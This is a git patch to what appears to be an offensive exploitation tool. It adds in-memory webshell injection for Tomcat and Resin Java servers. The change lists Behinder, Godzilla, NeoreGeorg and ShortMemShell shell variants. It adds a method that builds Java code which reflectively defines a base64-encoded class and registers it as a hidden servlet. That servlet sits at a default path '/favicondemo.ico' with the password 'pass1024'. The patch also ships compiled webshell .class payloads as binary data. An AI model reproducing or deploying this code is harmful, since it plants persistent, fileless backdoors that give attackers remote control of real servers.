From d1dc6e42bf15da9d59429ee7bcaba4af2f09f0e8 Mon Sep 17 00:00:00 2001
From: SearchNull <43846937@qq.com>
Date: Wed, 19 Jan 2022 11:50:10 +0800
Subject: [PATCH 1/3] add ShortMemShell and resin middleware

---
 src/main/java/io/github/exp1orer/StartUp.java |  17 +++---
 .../io/github/exp1orer/util/MemoryShell.java  |  50 +++++++++++++++++-
 src/main/resources/ResinMemShellServlet.class | Bin 0 -> 2428 bytes
 src/main/resources/ShortMemShellFilter.class  | Bin 0 -> 8512 bytes
 src/main/resources/ShortMemShellServlet.class | Bin 0 -> 12135 bytes
 5 files changed, 57 insertions(+), 10 deletions(-)
 create mode 100644 src/main/resources/ResinMemShellServlet.class
 create mode 100644 src/main/resources/ShortMemShellFilter.class
 create mode 100644 src/main/resources/ShortMemShellServlet.class

diff --git a/src/main/java/io/github/exp1orer/StartUp.java b/src/main/java/io/github/exp1orer/StartUp.java
index 0ec2b09..f08b24d 100644
--- a/src/main/java/io/github/exp1orer/StartUp.java
+++ b/src/main/java/io/github/exp1orer/StartUp.java
@@ -89,12 +89,15 @@ public class StartUp {
             String[] proxies = options.get("proxy").split(":", 2);
             proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxies[0], Integer.parseInt(proxies[1])));
         }
-        memoryShell.add("BehinderFilter");
-        memoryShell.add("BehinderServlet");
-        memoryShell.add("GodzillaFilter");
-        memoryShell.add("GodzillaServlet");
-        memoryShell.add("NeoreGeorgFilter");
-        memoryShell.add("NeoreGeorgServlet");
+        memoryShell.add("TomcatBehinderFilter");
+        memoryShell.add("TomcatBehinderServlet");
+        memoryShell.add("TomcatGodzillaFilter");
+        memoryShell.add("TomcatGodzillaServlet");
+        memoryShell.add("TomcatNeoreGeorgFilter");
+        memoryShell.add("TomcatNeoreGeorgServlet");
+        memoryShell.add("TomcatShortMemShellFilter");
+        memoryShell.add("TomcatShortMemShellServlet");
+        memoryShell.add("ResinShortMemShellServlet");
 
         try {
             Class.forName("io.github.exp1orer.util.Config");
@@ -283,7 +286,6 @@ public class StartUp {
      * @author: SearchNull
      */
     private static boolean checkCommandEcho() {
-        String line;
         String respContent;
         String uuid = UUID.randomUUID().toString();
         String command = "echo " + uuid;
@@ -338,7 +340,6 @@ public class StartUp {
      * @author: SearchNull
      */
     private static boolean runCommand(int index, String command) {
-        String line;
         String respContent;
         if (headers == null) {
             headers = new HashMap<String, String>();
diff --git a/src/main/java/io/github/exp1orer/util/MemoryShell.java b/src/main/java/io/github/exp1orer/util/MemoryShell.java
index 05bb5e6..95407ac 100644
--- a/src/main/java/io/github/exp1orer/util/MemoryShell.java
+++ b/src/main/java/io/github/exp1orer/util/MemoryShell.java
@@ -8,6 +8,7 @@ import java.util.Base64;
 
 public class MemoryShell {
     private static MemoryShell instance = new MemoryShell();
+    private static String className = "";
 
     private MemoryShell() {}
 
@@ -20,7 +21,11 @@ public class MemoryShell {
             return "";
         }
 
-        return instance.tomcatMemoryShell(name + ".class");
+        if ("ResinMemShellServlet".equals(name)) {
+            return instance.resinMemoryShell(name);
+        } else {
+            return instance.tomcatMemoryShell(name + ".class");
+        }
 
     }
 
@@ -90,6 +95,46 @@ public class MemoryShell {
         return code;
     }
 
+    private String resinMemoryShell(String name) {
+        String payload = renameClass("User", name + ".class");
+        String code = String.format("try {\n" +
+                "    Class si = Thread.currentThread().getContextClassLoader().loadClass(\"com.caucho.server.dispatch\" + \".ServletInvocation\");\n" +
+                "    java.lang.reflect.Method getContextRequest = si.getMethod(\"getContextRequest\");\n" +
+                "    javax.servlet.ServletRequest contextRequest = (javax.servlet.ServletRequest ) getContextRequest.invoke(null);\n" +
+                "    com.caucho.server.http.HttpServletRequestImpl req = (com.caucho.server.http.HttpServletRequestImpl ) contextRequest;\n" +
+                "    javax.servlet.http.HttpServletResponse rep = (javax.servlet.http.HttpServletResponse)  req.getServletResponse();" +
+                "    java.io.PrintWriter out = rep.getWriter();" +
+                "    javax.servlet.http.HttpSession session = req.getSession();\n" +
+                "    String path = req.getHeader(\"path\") != null ? req.getHeader(\"path\") : \"/favicondemo.ico\";\n" +
+                "    String pwd = req.getHeader(\"p\") != null ? req.getHeader(\"p\") : \"pass1024\";\n" +
+                "\n" +
+                "    java.lang.reflect.Method getServletContext = javax.servlet.ServletRequest.class.getMethod(\"getServletContext\");\n" +
+                "    Object web =getServletContext.invoke(contextRequest);\n" +
+                "\n" +
+                "    com.caucho.server.webapp.WebApp web1 = (com.caucho.server.webapp.WebApp ) web;\n" +
+                "\n" +
+                "    com.caucho.server.dispatch.ServletMapping smapping = new com.caucho.server.dispatch.ServletMapping();\n" +
+                "\n" +
+                "    String s1=\"%s\";" +
+                "    byte[] bytes1 = java.util.Base64.getDecoder().decode(s1.getBytes());\n" +
+                "\n" +
+                "    java.lang.reflect.Method m = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{String.class, byte[].class, int.class, int.class});\n" +
+                "    m.setAccessible(true);\n" +
+                "    m.setAccessible(true);\n" +
+                "    m.invoke(ClassLoader.getSystemClassLoader(), new Object[]{\"%s\", bytes1, 0, bytes1.length});\n" +
+                "    session.setAttribute(\"u\", pwd);\n" +
+                "    smapping.setServletClass(\"%s\");\n" +
+                "    smapping.setServletName(\"%s\");\n" +
+                "    smapping.addURLPattern(path);\n" +
+                "    web1.addServletMapping(smapping);\n" +
+                "    out.println(\"->|Success|<-\");" +
+                "} catch (Exception e) {\n" +
+                "    e.printStackTrace();\n" +
+                "}", payload, className, className, className);
+
+        return code;
+    }
+
     private String renameClass(String prefix, String resourceName) {
         String bytecodes = "";
         ClassPool pool = ClassPool.getDefault();
@@ -100,7 +145,8 @@ public class MemoryShell {
 
         try {
             CtClass ctClass = pool.makeClass(is);
-            ctClass.setName(prefix + System.nanoTime());
+            className = prefix + System.nanoTime();
+            ctClass.setName(className);
             byte[] bytes = ctClass.toBytecode();
             bytecodes = Base64.getEncoder().encodeToString(bytes);
         } catch (IOException | CannotCompileException e) {
diff --git a/src/main/resources/ResinMemShellServlet.class b/src/main/resources/ResinMemShellServlet.class
new file mode 100644
index 0000000000000000000000000000000000000000..910e691feba37c80b35b666f0ed11fa0a9eafb64
GIT binary patch
literal 2428
zcmai0SyvQC6#i<MnHri_U|4kGh9<HIIBGNt7!0lu5eQ>6DoN~V3Z}8Ad+6>VWHDwl
zCT20qLrngF&%TT?o|BU&AM#`Jo`+~|b@z-75#SuEtLtvx{qC(h{nw-4{{V0RKPcFa
z5spy>F^n|eHJnaitN~{*&M}d~WD2h<;Fwa7!&$k!q2L_ObG)fwBQB(HQ9dupWm+z8
zNk?xt;2m6+J550zx?E=DA~<FhJcBs}+fd*zIOZ9WhYic{h8XI)d(JV$kJ&SVp>fQx
z#CW-w7tUENZ_-J6%+@vYoaPwvJv@wi1;b@%ADa@cVVx1hTtS#-PB@FE@CF$YGxjOr
zF-&!j&1;L=Qq~Pb*@EYlvLm#Fx>I7IEL?AJT{X94Tdo+CP-8N5n{Sad?ChvjDtkH4
z5n7QV$6TGEB@mW9!_4M%&9a2!i}DPc1Cgm&b6GMnthuA**;!xCUE#WhZ83DL4#(FZ
zXLWjUMv^1b%SODBh!JZcJYR5PNf#xL97{7tEHHGf?%!vy$_kam5pIcLeHuf47&hcQ
zO}}zREBU3OCgZq5UBzKi`}oB#a#++73`z}|%VBd+pyZ4_X}eT8C1;l%U7R#z4`iNJ
z=Djj?6+6&Djj)o2fK-m6iUl~tNts}%a6zt{Rw^^3N}B8L-*@0315}i;$nma<CA_EN
zeSE<2p^B^ch@sgxjn-8HxJG549#-)&K2h;0K2z~IuB-S0Hz-pTU*anjH*uZgYZc$%
zTNU4-L&Yr#yyXd&8W}3Sm-0?@F|<A{bB68GZ1t{QOCfBrAn@|`W!Sy8->@$jI@i++
z+TnjV!dq8MwMu}*F%dac=7g84-iBS>J*)R?^**R%G3?QW%9lOrn9iVMm)(rOOK>!i
zpBK8E6iFHYnkg@I)FKr3T&$MdzerPM%QK4PUBauqw1w~j$Kf$~j*BHhv!E;LH@NYG
zQ6!U&ty89C5Hyz`DLiD@NRc7~hGA1R+Vawo`Q|Xt3W1zhYS|UXg=rKGPtavp15&iL
z$tN#p?zmW@OG8td$cS71OKTOx^1+kTN+n^@Sn69R=M{smo{~K81lXeaP11M_1%xH#
z*@0c8X(Ac~wj}jUnxD&RS>>E~NX(jLw?I$bv|XxWqi^94th0`$3+%)Y{WQwIIxsm}
zXx&L~S$fiFKw{55u)DO0VHd4Q|4_xVv{wTKJcr%%7MItTw8)s<Bxfl)yZr#M3-?er
z-g_T$hJkn{o=)6HGKPmp*Y<yc-$5ds8c1Xk4{;=2pGj1p{E9=rp+Rod3N{QRA7JB!
zO!6KY(@hmL5AY1HApHxP`sJpjg4XkQ9{=5UA8ic%6|`5dDR`-1b9IxsgVZ<)x7_uS
z-@=dd8(rt;HH1dO+eE0FX-!l5EksN!PNNN%&<-7&P$KQC*g{ioD~+-pWW5bP5qUoo
zX_Aj=)RX>hbfbrOx<r<H&`Tc`DcnFG`YBQqu3<0vj?@2T?8AN}$U~eyP@X3#@fC6@
zcL#CEM|m4B;6>u~C6XUN@?Z3Fyv#8$%rW=~{j_o%=6K~Fv_2;C>o|ruj&QsR#xWen
zQL;;t{V^P;NGGZ_!YD<QG5Ma}z6!QJDY5*X0Rc%;Dl)B(K&=Li*P!tbS~LX1NwSII
F)PL&WY2^R_

literal 0
HcmV?d00001

diff --git a/src/main/resources/ShortMemShellFilter.class b/src/main/resources/ShortMemShellFilter.class
new file mode 100644
index 0000000000000000000000000000000000000000..1f03b3267f4b078abc65ec3e824a95afcdde4769
GIT binary patch
literal 8512
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
aCLBue`(zF9>AP|bzExVra;@6wAN(KAhvmZn

literal 0
HcmV?d00001

diff --git a/src/main/resources/ShortMemShellServlet.class b/src/main/resources/ShortMemShellServlet.class
new file mode 100644
index 0000000000000000000000000000000000000000..3278d5303662844be20c40e781b75c6f75107387
GIT binary patch
literal 12135
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
